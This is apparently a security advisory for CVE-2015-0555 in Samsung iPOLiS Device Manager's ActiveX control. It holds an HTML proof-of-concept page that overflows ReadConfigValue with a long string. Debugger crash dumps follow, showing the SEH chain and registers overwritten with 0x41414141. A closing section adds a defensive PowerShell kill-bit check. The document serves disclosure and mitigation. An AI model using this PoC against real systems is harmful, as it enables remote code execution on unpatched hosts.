CVE: 2015-0555
Vulnerable File: "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype: "Function ReadConfigValue ( ByVal szKey As String ) As String"
memberName: "ReadConfigValue"
progid/ActiveX: "XNSSDKDEVICELib.XnsSdkDevice"
Operating System: Windows 7 Ultimate N SP1
Vulnerable Software: Samsung iPOLiS 1.12.2
Proof of Concept
<html>
<head>
<title>Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX ReadConfigValue Remote Code Execution PoC</title>
</head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'></object>
<script>
var argCount = 1;
var arg1 = "";
// build a 4001-byte string of "A" (0x41) and hand it to the vulnerable method
for (var i = 0; i <= 4000; i++) { arg1 += "A"; }
target.ReadConfigValue(arg1);
</script>
</html>
Stack Trace
Exception Code: ACCESS_VIOLATION
Disasm: 6492CE MOV AL,[EDI+EDX]
Seh Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
XNSSDKDEVICE.6492CE 41414141
41414141 8ABAB41
8ABAB41 mfc100.64BA90C1
mfc100.64BA90C1 3D39D016
FFFFFFFE mfc100.64AFBE5C
Registers:
--------------------------------------------------
EIP 006492CE
EAX 00000408
EBX 01AD9FB0 -> 0065A564
ECX 00000414
EDX 08ABAB41
EDI 0000009C
ESI 0000009C
EBP 002DEA9C -> Asc: AAAAAAAAA
ESP 002DE7F4 -> 59D56B19 -> Asc: k k
Block Disassembly:
--------------------------------------------------
6492BD MOV ECX,EAX
6492BF XOR ESI,ESI
6492C1 MOV [EBP-298],ECX
6492C7 TEST ECX,ECX
6492C9 JLE SHORT 00649340
6492CB MOV EDX,[EBP+8]
6492CE MOV AL,[EDI+EDX] <--- crash
6492D1 CMP AL,2F
6492D3 JNZ SHORT 00649333
6492D5 TEST EDI,EDI
6492D7 JNZ SHORT 00649304
6492D9 PUSH 80
6492DE LEA EAX,[EBP-90]
6492E4 PUSH EDI
6492E5 PUSH EAX
ArgDump:
--------------------------------------------------
EBP+8 08ABAB41
EBP+12 64BA90C1 -> EBE84589
EBP+16 3D39D016
EBP+20 FFFFFFFE
EBP+24 64AFBE5C -> CCCCCCC3
EBP+28 00000018
Stack Dump:
--------------------------------------------------
2DE7F4 19 6B D5 59 08 00 00 00 A0 EA 2D 00 10 92 64 00 [.k.Y..........d.]
2DE804 14 04 00 00 64 65 C4 64 00 00 00 00 00 00 00 00 [....de.d........]
2DE814 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
2DE824 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
2DE834 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [................]
Exception Code: ACCESS_VIOLATION
Disasm: 41414141 ?????
Seh Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
ntdll.77B670B4 ntdll.77BDAB1A
ntdll.77BDAB1A ntdll.77BB0404
ntdll.77BB0404 ntdll.77B3F956
ntdll.77B3F956 ntdll.77B67017
ntdll.77B67017 41414141
41414141 8ABAB41
8ABAB41 mfc100.64BA90C1
mfc100.64BA90C1 3D39D016
FFFFFFFE mfc100.64AFBE5C
Registers:
--------------------------------------------------
EIP 77B670B4 -> C0000005
EAX 002DE0EC -> C0000005
EBX 41414141
ECX 41414141
EDX 00000000
EDI 00000000
ESI 002DE0EC -> C0000005
EBP 002DE0D8 -> 002DE40C
ESP 002DE088 -> 77B662A4
Block Disassembly:
--------------------------------------------------
77B6709C MOV [ESP+8],EBX
77B670A0 JMP 77B837AD
77B670A5 LEA ESP,[ESP]
77B670AC LEA ESP,[ESP]
77B670B0 MOV EDX,ESP
77B670B2 SYSENTER
77B670B4 RETN <--- crash
77B670B5 LEA ESP,[ESP]
77B670BC LEA ESP,[ESP]
77B670C0 LEA EDX,[ESP+8]
77B670C4 INT 2E
77B670C6 RETN
77B670C7 NOP
77B670C8 PUSH EBP
77B670C9 MOV EBP,ESP
ArgDump:
--------------------------------------------------
EBP+8 002DE0EC -> C0000005
EBP+12 002DE13C -> 00000000
EBP+16 00000000
EBP+20 C0000005
EBP+24 00000001
EBP+28 00000000
P.S. CERT tried to coordinate but there wasn't any response from Samsung.
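Added mitigation check, not part of the original advisory: a PowerShell script that reports whether the control's CLSID (taken from the PoC above) is registered on a host and whether Internet Explorer's ActiveX kill bit is set for it, and sets the kill bit when run with -SetKillBit. The "Compatibility Flags" value 0x400 is Microsoft's documented kill-bit flag; the -SetKillBit switch and the output wording are this script's own.

```powershell
# Added example: check / set the IE ActiveX kill bit for the vulnerable XnsSdkDeviceIpInstaller control.
# CLSID comes from the PoC; 0x400 is Microsoft's documented kill-bit value for "Compatibility Flags".
param([switch]$SetKillBit)

$clsid    = '{D3B78638-78BA-4587-88FE-0537A0825A72}'
$flagName = 'Compatibility Flags'
$killBit  = 0x400

# Both registry views: native, plus the 32-bit view on 64-bit Windows (32-bit IE loads the 32-bit OCX).
$compatRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

# 1. Is the control registered at all?
$registered = @(
    "HKLM:\SOFTWARE\Classes\CLSID\$clsid",
    "HKLM:\SOFTWARE\Classes\Wow6432Node\CLSID\$clsid"
) | Where-Object { Test-Path $_ }
if ($registered) {
    Write-Host "XnsSdkDevice control $clsid is registered under:"
    $registered | ForEach-Object { Write-Host "  $_" }
} else {
    Write-Host "XnsSdkDevice control $clsid is not registered on this host."
}

# 2. Check (and optionally set) the kill bit in each registry view that exists on this OS.
foreach ($root in $compatRoots) {
    if (-not (Test-Path (Split-Path $root -Parent))) { continue }   # skip Wow6432Node on 32-bit Windows
    $key = Join-Path $root $clsid
    $current = 0
    if (Test-Path $key) {
        $current = (Get-ItemProperty -Path $key -Name $flagName -ErrorAction SilentlyContinue).$flagName
        if ($null -eq $current) { $current = 0 }
    }
    $isKilled = ($current -band $killBit) -ne 0
    Write-Host ("{0}: kill bit {1}" -f $key, $(if ($isKilled) { 'SET' } else { 'NOT set' }))

    if ($SetKillBit -and -not $isKilled) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        # OR the bit in so any other compatibility flags already present are preserved.
        New-ItemProperty -Path $key -Name $flagName -PropertyType DWord `
            -Value ($current -bor $killBit) -Force | Out-Null
        Write-Host "  -> kill bit set (requires an elevated shell; restart Internet Explorer to apply)."
    }
}
```

Setting the kill bit stops Internet Explorer from instantiating the control from any page; it does not remove the OCX, so a vendor fix or uninstalling iPOLiS Device Manager is still the durable remedy.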